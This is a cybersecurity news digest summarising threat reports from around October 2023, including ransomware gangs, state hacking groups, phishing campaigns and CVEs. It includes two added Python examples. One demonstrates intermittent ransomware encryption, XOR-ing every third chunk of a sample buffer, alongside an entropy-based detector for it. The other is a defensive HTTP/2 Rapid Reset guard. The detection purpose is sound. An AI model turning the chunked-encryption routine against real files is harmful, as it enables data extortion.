A report by Infoblox uncovers a concerning trend involving a link-shortening service called "Prolific Puma." This service assists cyber attackers and scammers by providing them with top-level .us domains, enabling them to run phishing campaigns with reduced visibility. Over the past 18 months, Prolific Puma has generated up to 75,000 unique domain names, often sidestepping regulations to offer malicious actors .us URLs.

Security Brief: TA571 Delivers IcedID Forked Loader

In a recent blog post, cybersecurity firm Proofpoint disclosed that it observed two campaigns, on October 11 and 18, 2023, in which TA571, a sophisticated cybercriminal threat actor, delivered the Forked variant of IcedID. The forked variant was observed being delivered via emails containing 404 TDS URLs that would lead to the download of a password-protected archive, with the password listed in the email. “The zip file contained a VBS script and a benign text file.”

BiBi-Linux: A New Wiper Dropped By Pro-Hamas Hacktivist Group

Researchers at Security Joes have uncovered a new Linux Wiper malware dubbed “BiBi-Linux Wiper,” being used by a pro-Hamas Hacktivist group to target Israeli entities in the ongoing Israeli-Hamas conflict. BiBi-Linux Wiper is an x64 ELF executable that is designed to render files unusable by overwriting their contents, further appending targeted files with an extension that uses the following structure “[RANDOM_NAME].BiBi[NUMBER].”

OT Cyber Attacks Proliferating Despite Growing Cybersecurity Spend

The significant rise in attacks on operational technology (OT) systems is primarily due to two key factors: increasing global threats from nation state actors and the involvement of profit-driven cybercriminals often backed by the former. The lack of success in defending against these attacks can be attributed to several factors, including the complexity of OT environments, the convergence of information technology and OT, insider attacks, supply chain vulnerabilities, and more.

Russia to Launch Its Own Version of VirusTotal Due to US Snooping Fear

The Russian government is developing its own malware scanning platform, similar to VirusTotal, to address concerns that the U.S. government might access data from the popular Google-owned service. This new platform, called "Multiscanner," is being created by Russia's National Technology Center for Digital Cryptography in collaboration with other organizations and private enterprises, including companies like Kaspersky, AVSoft, and Netoscope.

CISA Releases Logging Made Easy Article

We wanted to let members know that CISA has introduced a valuable toolset designed to assist companies with their logging requirements. "Logging Made Easy (LME)" is a reimagined offering by CISA that transforms a well-established log management solution into a reliable, centralized log management alternative.

A Cascade of Compromise: Unveiling Lazarus' New Campaign

Earlier this year, a software vendor fell victim to a Lazarus malware attack due to unpatched legitimate software. Despite previous warnings and patches from the vendor, vulnerabilities remained, allowing the threat actor to exploit them. Fortunately, proactive measures detected and thwarted an attack on another vendor. Further investigation revealed that the software vendor had been repeatedly targeted by Lazarus, indicating a persistent and determined threat actor likely seeking valuable source code or tampering with the software supply chain. The adversary used advanced techniques and introduced the SIGNBT malware for victim control.

Microsoft: Octo Tempest Is One of the Most Dangerous Financial Hacking Groups

Researchers at Microsoft released a comprehensive profile of Octo Tempest, a native-English-speaking threat actor known for advanced social engineering skills. Octo Tempest primarily focuses on data extortion and ransomware attacks against various companies. This threat actor’s tactics have been continuously evolving since early 2022, with expanded targeting encompassing organizations offering cable telecommunications, email, and tech services.

Cloudflare Sees Surge in Hyper-volumetric HTTP DDoS Attacks

Cloudflare says “the number of hyper-volumetric HTTP DDoS (distributed denial of service) attacks recorded in the third quarter of 2023 surpasses every previous year, indicating that the threat landscape has entered a new chapter” (Bleeping Computer, 2023). DDoS attacks are a type of cyber attack that sends large amounts of traffic towards hosted apps, websites, and online services in an attempt to overwhelm them and make them unavailable to legitimate visitors.

France Accuses Russian State Hackers of Targeting Government Systems, Universities, Think Tanks

“A hacking group associated with Russia’s military intelligence agency has been spying on French universities, businesses, think tanks, and government agencies, according to a new report from France’s top cybersecurity agency ANSSI” (The Record, 2023). According to the agency, APT28 (Fancy Bear) has been breaching French networks since the second half of 2021 looking for sensitive data. The group chose not to leverage backdoors and instead compromised devices like routers that aren’t as closely monitored.

Chilean Telecom Giant GTD Hit by the Rorschach Ransomware Gang

Chile's telecommunications company, Grupo GTD, has experienced a cyberattack that affected its Infrastructure as a Service (IaaS) platform. The attack caused disruptions to various online services, including data centers, internet access, and Voice-over-IP (VoIP). The attack has been attributed to the Rorschach ransomware gang and has led to the disconnection of the IaaS platform from the internet.

StripedFly Malware Framework Infects 1 Million Windows, Linux Hosts

A sophisticated cross-platform malware platform named StripedFly flew under the radar of cybersecurity researchers for five years, infecting over a million Windows and Linux systems during that time. Kaspersky discovered the true nature of the malicious framework last year, finding evidence of its activity starting in 2017, with the malware wrongly classified as just a Monero cryptocurrency miner.

Israeli-Hamas Conflict Spells Opportunity for Online Scammers

Researchers have exposed multiple cyber scams exploiting the Israeli-Hamas conflict. These scams involve more than 500 deceptive emails and fraudulent websites that take advantage of people’s desire to support those affected by the conflict. Many of these emails contain links to counterfeit websites claiming to provide information about the ongoing situation and encouraging individuals to donate using various cryptocurrency payment methods, as reported by Kaspersky researchers.

Attacks on Web Applications Spike in Third Quarter, New Talos IR Data Shows

There was a notable increase in threats to web applications, accounting for 30 percent of the engagements Cisco Talos Incident Response (Talos IR) responded to in the third quarter of 2023, compared to 8 percent the previous quarter. Exploitation of public-facing applications was the top observed means of gaining initial access, accounting for 30 percent of engagements.

Citrix Bleed Exploit Lets Hackers Hijack NetScaler Accounts

A proof-of-concept (PoC) exploit has been released for the 'Citrix Bleed' vulnerability, tracked as CVE-2023-4966, that allows attackers to retrieve authentication session cookies from vulnerable Citrix NetScaler ADC and NetScaler Gateway appliances. CVE-2023-4966 is a critical-severity, remotely exploitable information disclosure flaw that Citrix fixed on October 10 without providing many details.

ESET: Winter Vivern Exploits Zero-Day Vulnerability in Roundcube Webmail Servers

According to a report by ESET, a well-known endpoint protection vendor, the threat actor identified as Winter Vivern, also known as TA473 and UAC-0114, was detected exploiting a zero-day vulnerability in Roundcube webmail software on October 11, 2023, for the purpose of gathering email messages from victims' accounts. Telemetry data indicates that the campaign specifically targeted Roundcube Webmail servers owned by governmental entities and a think tank, all located in Europe.

Strengthening Ransomware Defense: The Importance of Security Patch Management

A recent TrendMicro report highlights that IT teams are currently grappling with a deluge of software patches, which are being released on a regular basis, ranging from monthly to daily. As per statistics, contemporary enterprises are burdened with managing an average of 1,061 applications, and due to the frequent issuance of patches by various software vendors, the need for strategic prioritization has become imperative.

'Log in with...' Feature Allows Full Online Account Takeover for Millions

Security flaws in the use of OAuth by Grammarly, Vidio, and Bukalapak could potentially put the financial and credential information of millions of users at risk. These issues also raise concerns that other online services may face similar problems, potentially leading to account takeovers, credential theft, and financial fraud for users across various websites. Salt Labs researchers found serious API misconfigurations on websites like Grammarly, Vidio, and Bukalapak, indicating that numerous other sites might be similarly affected.

September Was a Record Month for Ransomware Attacks in 2023

Ransomware activity in September reached unprecedented levels following a relative lull in August that was still way above regular standards for summer months. According to NCC Group data, ransomware groups launched 514 attacks in September. This surpasses March 2023 activity, which counted 459 attacks, and was heavily skewed by Clop's MOVEit Transfer data theft attacks.

Vietnamese DarkGate Malware Targets META Accounts in the UK, USA, India

Cybersecurity firm WithSecure has discovered a connection between recent DarkGate malware attacks targeting its clients and Vietnam-based threat actors engaged in a campaign to compromise Meta business accounts and pilfer sensitive data. WithSecure's Detection and Response Team (DRT) reported multiple DarkGate malware infection attempts against their clients' organizations in the UK, USA, and India on August 4, 2023. The attack methods closely resemble those seen in recent DuckTail infostealer campaigns, which WithSecure has been monitoring for over a year.

New TetrisPhantom Hackers Steal Data from Secure USB Drives on Govt Systems

A new sophisticated threat tracked as ‘TetrisPhantom’ has been using compromised secure USB drives to target government systems in the Asia-Pacific region. Secure USB drives store files in an encrypted part of the device and are used to safely transfer data between systems, including those in an air-gapped environment. Access to the protected partition is possible through custom software that decrypts the contents based on a user-provided password. One such software is UTetris[.]exe, which is bundled on an unencrypted part of the USB drive.

US Energy Firm Shares How Akira Ransomware Hacked its Systems

In a rare display of transparency, US energy services firm BHI Energy details how the Akira ransomware operation breached its network and stole data during the attack. BHI Energy, part of Westinghouse Electric Company, is a specialty engineering services and staffing solutions provider supporting private and government-operated oil & gas, nuclear, wind, solar, and fossil power generation units and electricity transmission and distribution facilities.

Google Chrome's New "IP Protection" Will Hide Users' IP Addresses

Google is set to introduce a new "IP Protection" feature in its Chrome browser to enhance user privacy by concealing their IP addresses through the use of proxy servers. This move aims to address privacy concerns related to IP addresses, which can be used for covert tracking, and marks Google's effort to strike a balance between user privacy and web functionality.

Tracking Unauthorized Access to Okta's Support System

In a recent statement from Okta Security, they've reported the discovery of malicious activity involving the unauthorized use of a stolen credential to access Okta's support case management system. The threat actor was able to access files uploaded by specific Okta customers as part of recent support cases. It's essential to clarify that the support case system operates independently of the primary Okta service, which remains fully functional and unaffected. Notably, the Auth0/CIC case management system has not been impacted by this incident.

Pro-Israeli Hacktivist Group 'Predatory Sparrow' Reappears

A hacktivist group supporting Israel, known as Predatory Sparrow, has resurfaced recently. Last week, the group broke its year-long silence by posting a tweet referencing the ongoing Gaza conflict, warning of its return and sharing a link to a report about the United States sending fighter planes and warships to aid Israel. Predatory Sparrow is recognized as a relatively advanced Israeli hacking operation, and it has a track record of conducting disruptive attacks in Iran, aimed at undermining the Iranian government.

ExelaStealer: A New Low-Cost Cybercrime Weapon Emerges

A report from Fortinet details a new information-stealing malware named ExelaStealer that has recently emerged in the cybersecurity landscape. ExelaStealer is described as a low-cost, mostly open-source infostealer with the option for paid customizations. This affordability and openness make it accessible to a wide range of cybercriminals, from novices to more seasoned threat actors. The malware is predominantly coded in Python and offers support for JavaScript. It possesses the capability to exfiltrate a variety of sensitive data, including passwords, Discord tokens, credit card information, cookies, session data, keystrokes, screenshots, and clipboard content.

Attacks on 5G Infrastructure from User Devices: ASN.1 Vulnerabilities in 5G Core

In a recent report from TrendMicro, researchers delve into critical vulnerabilities and risks associated with 5G and its infrastructure. They take a particular focus on the control plane and the susceptibility of the NGAP protocol to ASN.1-related issues. The first part of the report reveals how GTP-U tunnels can be exploited by user devices, potentially leading to core network crashes. In the second part, the report discusses how attackers can leverage these vulnerabilities by disguising control messages as user traffic, resulting in the transition from the user plane to the control plane.

North Korean Hackers Are Targeting Software Developers and Impersonating IT Workers

North Korean hackers have notably increased their emphasis on the IT industry by infiltrating companies involved in software development and organizations seeking IT professionals. On Wednesday, Microsoft disclosed that North Korean-affiliated hacking groups Lazarus (Diamond Sleet) and Andariel (Onyx Sleet) have been exploiting a critical authentication bypass vulnerability (CVE-2023-42793) in JetBrains TeamCity server.

QR Codes Used in 22% of Phishing Attacks

Hoxhunt released the results of their Hoxhunt Challenge, an exercise conducted in 38 organizations across nine industries and 125 countries. Their study revealed that 22% of phishing attacks in the first weeks of October 2023 used QR codes to deliver malicious payloads.

E-Root Admin Faces 20 Years for Selling Stolen RDP, SSH Accounts

Sandu Diaconu, the operator of the E-Root marketplace, has been extradited to the U.S. to face a maximum imprisonment penalty of 20 years for selling access to compromised computers. The Moldovan defendant was arrested in the U.K. in May 2021 while attempting to flee the country following the authorities' seizure of E-Root's domains in late 2020. Last month, Diaconu consented to be extradited to the United States on charges of wire fraud, money laundering, computer fraud, and access device fraud.

Iran-Linked OilRig Targets Middle East Governments in 8-Month Cyber Campaign

The OilRig threat group, connected to Iran, conducted an eight-month-long cyber campaign against an unspecified Middle Eastern government from February to September 2023. This operation resulted in the theft of files and passwords, and at one point, they used a PowerShell backdoor called PowerExchange. The Symantec Threat Hunter Team refers to this operation as "Crambus." The attackers used the PowerExchange implant to monitor emails from an Exchange Server, execute commands, and send the results to themselves. They compromised at least 12 computers and installed backdoors and keyloggers on an additional dozen machines, indicating a significant breach.

The Iron Swords War – Cyber Perspectives from the First 10 Days of the War in Israel

In a recent report from Check Point, the focus is on escalating cyber activities during the Israel-Hamas conflict. The key points include a surge in cyberattacks targeting Israel, diverse cyber threats like DDoS attacks and hack-and-leak incidents, and the involvement of various hacktivist groups aligned with geopolitical interests. These developments are causing heightened risks and tensions in the cyber domain.

Multiple North Korean Threat Actors Exploiting the TeamCity CVE-2023-42793 Vulnerability

Two North Korean nation-state actors, Lazarus (or Zinc) and Plutonium (or Andariel), have been exploiting a known remote code execution vulnerability in the TeamCity continuous integration and continuous deployment tool. The vulnerability, CVE-2023-42793, was patched by JetBrains in version 2023.05.4. These actors have been targeting on-premises instances of TeamCity, deploying backdoors, stealing credentials, and more. Microsoft's threat intelligence group observed these attacks and noted that both groups may be opportunistically compromising vulnerable servers, but they have also used techniques that could provide persistent access to victim environments.

Ex-Navy IT Head Gets 5 Years for Selling People’s Data on Darkweb

Marquis Hooper, a former U.S. Navy IT manager, has received a sentence of five years and five months in prison for illegally obtaining US citizens' personally identifiable information (PII) and selling it on the dark web. The man was indicted with his wife, Natasha Renee Chalk, in February 2021 and pleaded guilty to aggravated identity theft and conspiracy to commit wire fraud in March 2023.

Ukrainian Activists Hack Trigona Ransomware Gang, Wipe Servers

A group of cyber activists under the Ukrainian Cyber Alliance (UAC) banner has hacked the servers of the Trigona ransomware gang and wiped them clean after copying all the information available. The Ukrainian Cyber Alliance fighters say they exfiltrated all of the data from the threat actor’s systems, including source code and database records, which may include decryption keys.

D-Link Confirms Data Breach after Employee Phishing Attack

Taiwanese networking equipment manufacturer D-Link confirmed a data breach linked to information stolen from its network and put up for sale on BreachForums earlier this month. The attacker claims to have stolen source code for D-Link's D-View network management software, along with millions of entries containing personal information of customers and employees, including details on the company's CEO.

Critical Vulnerabilities Expose Weintek HMIs to Attacks

Last week, CISA warned organizations about critical and high-severity vulnerabilities in a human-machine interface (HMI) product made by Taiwan-based Weintek. According to CISA, the impacted product, the Weintek cMT HMI, is used worldwide, including in critical manufacturing organizations, which are considered part of critical infrastructure.

Is It On or Off? Cisco IOS XE Devices Hacked in Widespread Attacks

Amid the COVID-19 pandemic, as remote work became a necessity, IT teams had to rapidly implement protocols and software suites to maintain business continuity and efficiency. This involved enabling routing configurations and adjusting inbound and outbound policies on appliances that previously didn't support remote connections. This allowed networking appliances and software packages to be accessed and configured on-the-fly, enabling staff to access the necessary resources for their work from locations outside the traditional office spaces.

Russian Sandworm Hackers Breached 11 Ukrainian Telcos Since May

The state-sponsored Russian hacking group tracked as 'Sandworm' has compromised eleven telecommunication service providers in Ukraine between May and September 2023. That is based on a new report by Ukraine's Computer Emergency Response Team (CERT-UA) citing 'public resources' and information retrieved from some breached providers.

Researchers Warn of Increased Malware Delivery via Fake Browser Updates

Researchers from Sekoia have released details on a new campaign from the threat group behind SocGholish. This latest activity leverages compromised WordPress sites to push malicious fake browser updates. The campaign, dubbed ClearFake, injects JavaScript into compromised WordPress websites so that the page downloads a second JavaScript payload from an attacker-controlled domain.

Colonial Pipeline Attributes Ransomware Claims to ‘Unrelated’ Third-Party Data Breach

Colonial Pipeline has reported that there has been no disruption to its pipeline operations or systems following threats from a ransomware group known as Ransomed.vc. Colonial Pipeline is responsible for operating the largest pipeline system for refined oil products in the United States. The Ransomed.vc gang claimed that they had stolen data from Colonial Pipeline's systems.

macOS Malware 2023 | A Deep Dive into Emerging Trends and Evolving Techniques

A recent SentinelOne report highlights a noteworthy shift in macOS malware behavior: many families are moving away from persistence altogether. Infostealers in particular have taken center stage, aiming to accomplish their objectives in a single execution. This includes the theft of valuable data such as admin passwords, browsing history, and cookies, all achieved without relying on traditional methods of maintaining persistence.

Women Political Leaders Summit Targeted in Romcom Malware Phishing

A less detectable version of the RomCom backdoor was used to target attendees of the Women Political Leaders Summit in Brussels, which centers on gender equality and women in politics. The attackers created a fake website resembling the official WPL portal to lure individuals looking to participate or learn about the summit.

EPA Calls Off Cyber Regulations for Water Sector

The Environmental Protection Agency will no longer require cybersecurity audits of U.S. water utilities through sanitary surveys. In a letter to state drinking water administrators on Thursday, the EPA said litigation from Republican states and trade associations, which raised questions about the long-term legal viability of the initiative to regulate the cybersecurity of water utilities, drove the decision to rescind a March memorandum implementing the rule.

Ransomware Attacks Now Target Unpatched WS_FTP Servers

Internet-exposed WS_FTP servers unpatched against a maximum severity vulnerability are now targeted in ransomware attacks. As recently observed by Sophos X-Ops incident responders, threat actors self-described as the Reichsadler Cybercrime Group attempted, unsuccessfully, to deploy ransomware payloads created using a LockBit 3.0 builder stolen in September 2022.

DarkGate Malware Spreading via Messaging Services Posing as PDF Files

The DarkGate malware is being spread through messaging platforms like Skype and Microsoft Teams. It disguises itself as a PDF document, but contains a harmful script that downloads and runs the malware. It’s uncertain how the attackers compromised the messaging app accounts, but it’s suspected to be due to leaked credentials or a previous compromise of the organization.

Newest Ransomware Trend: Attackers Move Faster with Partial Encryption

A recent Check Point report observes that ransomware actors can incapacitate systems far faster by using partial (intermittent) encryption. Encrypting large volumes of data in full is slow, and a long-running encryption job gives defenders time to notice and intervene. Partial encryption instead scrambles only a fraction of each file, for example the first part of the file or every Nth block, which is enough to leave the data unusable until the ransom is paid while cutting the time and disk I/O the attacker spends.
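
The following is an added example, not code from the Check Point report, showing both sides of the technique described above: a constructed keystream encrypts only every third chunk of a file, and a detector then looks for the on-disk signature that leaves behind (near-random chunks interleaved with untouched plaintext). The 4 KB chunk size, the every-third-chunk schedule, the sample log file and the entropy thresholds are assumptions for illustration.

```python
"""Intermittent ("partial") encryption and an entropy-profile detector.

Added example; chunk size, schedule and thresholds are assumptions.
"""
from __future__ import annotations

import hashlib
import hmac
import math

CHUNK = 4096  # assumed chunk size; real families vary this per file size


def keystream(key: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode. Enough to make ciphertext look random
    for the demonstration; not a cipher you would deploy."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def partial_encrypt(data: bytes, key: bytes, every_n: int = 3) -> tuple[bytes, int]:
    """XOR chunk 0 and every `every_n`-th chunk with a per-chunk keystream and
    leave the others untouched. XOR is its own inverse, so calling this again
    with the same key restores the plaintext. Returns (buffer, bytes_touched)."""
    out = bytearray(data)
    touched = 0
    for offset in range(0, len(data), CHUNK):
        chunk_no = offset // CHUNK
        if chunk_no % every_n:
            continue  # skipped chunk: plaintext stays on disk
        block = data[offset:offset + CHUNK]
        ks = keystream(key + chunk_no.to_bytes(4, "big"), len(block))
        out[offset:offset + len(block)] = bytes(a ^ b for a, b in zip(block, ks))
        touched += len(block)
    return bytes(out), touched


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a single repeated value, 8.0 for uniform bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def entropy_profile(data: bytes) -> list[float]:
    """Entropy of each CHUNK-sized slice, in file order."""
    return [shannon_entropy(data[i:i + CHUNK]) for i in range(0, len(data), CHUNK)]


def looks_partially_encrypted(data: bytes, high: float = 7.5, low: float = 6.0) -> bool:
    """True when chunk entropy flips between 'near random' and 'clearly
    structured' at least twice. Fully encrypted files are high everywhere and
    ordinary files low everywhere, so neither trips this check."""
    state = None
    flips = 0
    for e in entropy_profile(data):
        band = "high" if e >= high else "low" if e <= low else state
        if state is not None and band != state:
            flips += 1
        state = band
    return flips >= 2


# Constructed sample: a low-entropy log file of about 30 KB (8 chunks).
SAMPLE_PLAINTEXT = b"2023-10-01 12:00:00 INFO user=alice action=login ok\n" * 600
SAMPLE_KEY = b"example-key-not-secret"


def demo() -> dict:
    """Encrypt the sample partially and fully, then run the detector on both."""
    ct, touched = partial_encrypt(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    full, _ = partial_encrypt(SAMPLE_PLAINTEXT, SAMPLE_KEY, every_n=1)
    return {
        "bytes_touched": touched,
        "fraction_touched": touched / len(SAMPLE_PLAINTEXT),
        "partial_flagged": looks_partially_encrypted(ct),
        "plaintext_flagged": looks_partially_encrypted(SAMPLE_PLAINTEXT),
        "full_flagged": looks_partially_encrypted(full),
        "roundtrip_ok": partial_encrypt(ct, SAMPLE_KEY)[0] == SAMPLE_PLAINTEXT,
    }


if __name__ == "__main__":
    print(demo())
```

With the every-third-chunk schedule only 3 of the 8 chunks (12,288 of 31,200 bytes) are touched, yet the file is useless without the key. The detector deliberately ignores files that are uniformly high-entropy (archives, media, fully encrypted data) and keys on the alternating pattern instead, which is what distinguishes intermittent encryption from both normal files and conventional full-file ransomware.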

Assessed Cyber Structure and Alignments of North Korea in 2023

North Korea’s state-sponsored hackers, under the direction of its ruling regime, are constantly improving their tactics for conducting cyber operations. This information comes from a recent report by Google’s Mandiant threat intelligence team. The report reveals how the Pyongyang-based regime, despite its small population of 25 million, utilizes cyber intrusions for both espionage and financial crimes, thereby bolstering its power and financing its cyber and kinetic capabilities.

A Frontline Report of Chinese Threat Actor Tactics and Techniques

Microsoft threat intelligence analysts are seeing Chinese threat groups deploy less desktop malware and prioritize the theft of passwords and tokens that grant access to sensitive systems used by remote workers. Since the COVID-19 pandemic, working from home has become the norm, with organizations granting employees remote access to sensitive systems and resources.

LinkedIn Smart Links Attacks Return to Target Microsoft Accounts

Cofense has detected a surge in the abuse of LinkedIn Smart Links in phishing attacks, allowing actors to bypass protection measures and evade detection. “Smart Links are part of LinkedIn's Sales Navigator service, used for marketing and tracking, allowing Business accounts to email content using trackable links to determine who engaged with it. Also, because Smart Link uses LinkedIn's domain followed by an eight-character code parameter, they appear to originate from a trustworthy source and bypass email protections.”

AvosLocker Ransomware Continues to Target US - CISA Alert AA23-284A

On October 11, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on AvosLocker ransomware. AvosLocker is a Ransomware-as-a-Service group that employs double extortion tactics in its ransomware attack campaigns. AvosLocker was first seen in June 2021, and it has multiple ransomware variants for Windows, Linux, and VMware ESXi environments.

High Severity Vulnerability in curl 8.4.0

Last week, the curl project pre-announced a high-severity flaw in curl, the popular command-line transfer tool. Curl project founder and lead developer Daniel Stenberg called it “probably the worst curl security flaw in a long time.” While details were initially withheld, a patch released today fixed two separate vulnerabilities tracked as CVE-2023-38545 and CVE-2023-38546.

One-Click Exploit Reveals Common Software's Supply Chain Risk in Linux Operating Systems

Researchers from GitHub security lab have discovered a critical vulnerability in a library used within the GNOME desktop environment for Linux systems. GNOME is a popular open-source desktop environment found in distributions like Ubuntu and Fedora. The vulnerability, rated 8.8 out of 10, resides in a library called "libcue," which is used for parsing metadata related to CD or DVD track layouts.

Google Mitigated the Largest DDoS Attack to Date, Peaking Above 398 Million RPS

Google says it mitigated a series of DDoS attacks reaching a peak of 398 million requests per second (rps), which is nearly 9 times bigger than the largest-recorded DDoS attack last year, peaking at 46 million rps. The latest set of attacks started in August and are still ongoing. According to Google, the attacks rely on a novel technique dubbed “Rapid Reset” which leverages stream multiplexing, a feature of the widely-adopted HTTP/2 protocol.
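
The guard below is an added example, not Google's or any server vendor's code. Rapid Reset works because a client can open a stream with HEADERS and cancel it with RST_STREAM immediately: the cancelled stream no longer counts against the concurrent-stream limit, so the client can keep opening streams far faster than the limit suggests, while the server still pays the cost of dispatching each request. The mitigations servers shipped bound how many cancellations a peer may issue per unit time; this is a per-connection version of that idea. The frame traces, the threshold of 100 resets per second and the window length are constructed for the example.

```python
"""Per-connection guard against HTTP/2 Rapid Reset.

Added example; frame traces, threshold and window are constructed.
"""
from __future__ import annotations

from collections import deque


class RapidResetGuard:
    """Count peer-initiated RST_STREAM frames in a sliding window and close
    the connection once the count exceeds the budget."""

    def __init__(self, max_resets: int = 100, window_s: float = 1.0) -> None:
        self.max_resets = max_resets
        self.window_s = window_s
        self.resets = deque()  # timestamps of RST_STREAM frames from the peer
        self.closed = False

    def on_frame(self, ts: float, frame: str, stream_id: int) -> str:
        """Return the action for one inbound frame: OK, GOAWAY (close the
        connection now) or DROP (frames arriving after we closed)."""
        if self.closed:
            return "DROP"
        if frame == "RST_STREAM":
            self.resets.append(ts)
            # slide the window forward: forget resets older than window_s
            while self.resets and ts - self.resets[0] > self.window_s:
                self.resets.popleft()
            if len(self.resets) > self.max_resets:
                self.closed = True
                return "GOAWAY"
        return "OK"


def attack_trace(streams: int = 200, interval_s: float = 0.0005) -> list[tuple[float, str, int]]:
    """Constructed Rapid Reset pattern: every stream is opened and cancelled
    in the same instant, 200 streams inside a tenth of a second."""
    frames = []
    for i in range(streams):
        ts, sid = i * interval_s, 2 * i + 1  # client-initiated streams use odd IDs
        frames.append((ts, "HEADERS", sid))
        frames.append((ts, "RST_STREAM", sid))
    return frames


def benign_trace(streams: int = 50, interval_s: float = 0.02) -> list[tuple[float, str, int]]:
    """Constructed busy but legitimate client: 50 requests spread over one
    second, one in ten cancelled (a user navigating away, say)."""
    frames = []
    for i in range(streams):
        ts, sid = i * interval_s, 2 * i + 1
        frames.append((ts, "HEADERS", sid))
        if i % 10 == 0:
            frames.append((ts + interval_s / 2, "RST_STREAM", sid))
    return frames


def simulate(trace: list[tuple[float, str, int]], guard: RapidResetGuard | None = None) -> dict:
    """Feed a trace through a guard and summarise what happened."""
    guard = guard or RapidResetGuard()
    actions = [guard.on_frame(ts, frame, sid) for ts, frame, sid in trace]
    return {
        "closed": guard.closed,
        "goaway_frame_index": actions.index("GOAWAY") if "GOAWAY" in actions else None,
        "dropped": actions.count("DROP"),
        "frames": len(actions),
    }


if __name__ == "__main__":
    print("attack :", simulate(attack_trace()))
    print("benign :", simulate(benign_trace()))
```

The budget is on cancellations, not on requests, so a legitimately chatty client is untouched while the attack pattern trips the guard on its 101st reset, after which the connection is torn down with GOAWAY and nothing further is dispatched. Real deployments tune the budget per listener and usually combine it with the usual per-IP connection limits.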

Microsoft to kill off VBScript in Windows to block malware delivery

Microsoft says it is working on removing VBScript (Visual Basic Script), a scripting language it introduced roughly 30 years ago, from Windows. Although VBScript was designed for Windows automation and administrative tasks, threat actors have for years misused it to create and deliver malicious payloads.

New Threat Actor “Grayling” Blamed For Espionage Campaign

Security researchers have revealed evidence of a newly discovered APT group that primarily targeted Taiwanese organizations during a cyber-espionage campaign spanning at least four months. Known as "Grayling" according to Symantec, this group initiated their operations in February 2023 and persisted until at least May 2023.

Phishing Scam Alert - Impersonation of USPS and Dozens of National Postal Services

As we approach the holiday season, we've remained vigilant in warning our members about the recent surge in phishing attacks targeting U.S. Postal Service (USPS) customers. These malicious campaigns are disseminated through SMS, email, and various other phishing methods. In these attacks, criminals impersonate USPS services with the intent to deceive individuals and pilfer personal and financial information.

Microsoft Releases New Report on Cybercrime, State-Sponsored Cyber Operations

According to Microsoft’s latest Digital Defense Report, Ukraine, the United States, and Israel were the most targeted countries based on state-sponsored threat activity observed by the tech giant against organizations in more than 120 countries. Based on intel gathered between July 2022 and June 2023, the majority of cyber attacks observed were fueled by nation-state spying and influence operations, with 40% of all observed attacks targeting critical infrastructure organizations.

D.C. Board of Elections Confirms Voter Data Stolen in Site Hack

The District of Columbia Board of Elections (DCBOE) is currently probing a data leak involving an unknown number of voter records following breach claims from a threat actor known as RansomedVC. DCBOE operates as an autonomous agency within the District of Columbia Government and is entrusted with overseeing elections, managing ballot access, and handling voter registration processes.

Hackers Hijack Citrix NetScaler Login Pages to Steal Credentials

Hackers are conducting a large-scale campaign to exploit the recent CVE-2023-3519 flaw in Citrix NetScaler Gateways to steal user credentials. The flaw is a critical unauthenticated remote code execution bug discovered as a zero-day in July that impacts Citrix NetScaler ADC and NetScaler Gateway. By early August, the flaw had been leveraged to backdoor at least 640 Citrix servers, and the figure reached 2,000 by mid-August.

NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations

The UK's National Cyber Security Centre (NCSC) has released guidance to assist medium to large organizations in mapping their supply chains, with a focus on boosting confidence in managing vulnerabilities related to suppliers. Additionally, a report by Picus Security highlights the growing prevalence of multipurpose malware, which possesses multiple functionalities.

GitHub's Secret Scanning Feature Now Covers AWS, Microsoft, Google, and Slack

GitHub recently updated its secret scanning feature to extend validity checks to popular services including Amazon Web Services (AWS), Microsoft, Google, and Slack. The feature was introduced earlier this year to help alert users whether exposed tokens found by the secret scanning are active. While the feature was first enabled for GitHub tokens, the cloud-based code hosting and version control service is now including support for more tokens.

Sony Confirms Data Breach Impacting Thousands in the U.S.

Sony Interactive Entertainment (Sony) has informed both current and former employees and their family members regarding a cybersecurity incident that resulted in the exposure of personal information. The company has dispatched data breach notifications to approximately 6,800 individuals, verifying that the breach transpired due to an unauthorized entity exploiting a zero-day vulnerability in the MOVEit Transfer platform.

Maritime Infrastructure Security Breaches from Drones ‘Becoming a Common Occurrence,’ Says Report

A recent report finds that drones over sensitive maritime facilities have become a common occurrence. It also criticizes the effectiveness of current federal counter-UAS legislation, citing a lack of authorities and capabilities to intercept suspicious drones. U.S. Coast Guard Capt. Andrew J. Meyers emphasized the importance of Area Maritime Security Committees (AMSCs) in safeguarding the nation's ports, praising their role in fostering relationships, collaborative planning, communication, and unity of effort.

Exploits Released for Linux Flaw Giving Root on Major Distros

Proof-of-concept exploits have already surfaced online for a high-severity flaw in GNU C Library's dynamic loader, allowing local attackers to gain root privileges on major Linux distributions. Dubbed 'Looney Tunables' and tracked as CVE-2023-4911, this security vulnerability is due to a buffer overflow weakness, and it affects default installations of Debian 12 and 13, Ubuntu 22.04 and 23.04, and Fedora 37 and 38.

Atlassian Confluence Hit by New Actively Exploited Zero-Day – Patch Now

Atlassian has published security updates to fix an actively exploited zero-day vulnerability in its Confluence Data Center and Server software. Tracked as CVE-2023-22515, the flaw relates to a case of privilege escalation. Although Atlassian did not specify the root cause of this flaw, the vulnerability could allow a regular user account to elevate to admin.

US Executives Targeted in Phishing Attacks Exploiting Flaw in Indeed Job Platform

In a recent report from Menlo Security, it was discovered that Indeed, a widely recognized global job search platform headquartered in the US, boasting over 350 million monthly visitors and a global workforce of more than 14,000 employees, has become the focus of a significant phishing campaign. This campaign underscores how threat actors can exploit the platform's credibility and popularity.

EvilProxy Uses Indeed.com Open Redirect For Microsoft 365 Phishing

A recently uncovered phishing campaign is targeting Microsoft 365 accounts of key executives in U.S.-based organizations by abusing open redirects from the Indeed employment website for job listings. The threat actor is using the EvilProxy phishing service that can collect session cookies, which can be used to bypass multi-factor authentication (MFA) mechanisms.
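
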